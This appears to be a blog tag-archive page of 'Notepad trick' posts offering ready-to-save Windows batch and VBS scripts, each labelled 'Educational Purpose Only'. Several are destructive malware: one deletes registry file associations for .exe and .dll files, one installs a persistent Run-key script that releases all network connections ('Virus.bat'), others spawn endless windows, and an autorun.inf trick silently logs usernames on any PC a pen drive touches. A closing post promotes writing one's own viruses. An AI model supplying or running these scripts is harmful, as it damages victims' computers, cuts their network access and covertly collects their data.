Open up multiple Applications at once … @echo off 😡 start winword start mspaint start notepad start write start cmd start explorer start control start calc goto x Save it as App.bat Warning: Don’t open it on your own PC (Educational Purpose Only)
Tag Archives: Notepad Trick
POPPING UP CD DRIVE
Do you still remember that some Disc has this? If you try to copy a video or music by open it directly the this will happen? Your CD/DVD POP UP ENDLESSLY? Well, here how you can create it too using notepad.. Set oWMP = CreateObject(”WMPlayer.OCX.7″) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1Continue reading “POPPING UP CD DRIVE”
Infinite Notepad Loop
In this post, i will give you a script which you can open an endless notepad @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top Save as loop.bat Warning: Don’t open it on your own PC (Educational Purpose Only)
Delete Key Registry Files Notepad Script
@ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO Your System is Fucked up !! Hahahaha. GOTO MESSAGE Save as delete.batWarning : Don’t open it on your own PC(Educational Purpose Only)
Disable Internet Permanent Using Notepad Script
echo @echo off>c:windowswimn32.bat echo break off>c:windowswimn32.bat echo ipconfig/release_all>c:windowswimn32.bat echo end>c:windowswimn32.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED! PAUSE Save as Virus.bat Warning : Don’t open it on your own PC (Educational Purpose Only)
How to turn on your computer fast
Here’s what you have to do to turn your PC ON in 10 seconds. You have to do the following steps:- 1.Click on the START button then, 2.Go to RUN. 3.type Regedit and hit Enter. 4.this will open Registery Editor5. Now look for the below key HKEY_LOACAL_MECHINE\SYSTEM\CurrentControlSet\Control\ ContentIndex 6.Now there find the Key Called “Startup Delay” Double Click On It. 7.NowContinue reading “How to turn on your computer fast”
How Virtual Network Work Part II
Mobile VPN offers a similar level of geographic flexibility when compared to normal VPN as it can offer remote access to your home network – an invaluable tool to have when you think about the positives. In brief, you could upload basic information to your Android device and leave all the sensitive data on yourContinue reading “How Virtual Network Work Part II”
Track How many PC's your Pen drive has been inserted
1st Steps – Create an autorun.inf file on the root of your flash drive/Pendrive with the following contents: [autorun] open=username.bat action=Open folder to view files 2nd – create a batch file called username.bat with the following contents: @echo off echo %username%>>users.dat date /t>>users.dat time /t>>users.dat start “Explorer” %SystemRoot%\explorer.exe NOTE : The Last Line of theContinue reading “Track How many PC's your Pen drive has been inserted”
Did you know?
HACKER haku(r) – 1. A programmer who breaks into computer systems in order to steal or change or destroy information as a form of cyber-terrorism 2.One who works hard at boring tasks 3.Its is also a term used by some to mean ”a clever programmer”. “A good hack” is a clever solution to a programmingContinue reading “Did you know?”
Batch Files -The Arts Of Creating Viruses
I could just you give the codes to paste in notepad and ask you to save files with extension .bat and your deadly batch viruses would be ready. But instead of that, I have focused on making the basics of batch files clear and developing the approach to code your own viruses. What are Batch FilesContinue reading “Batch Files -The Arts Of Creating Viruses”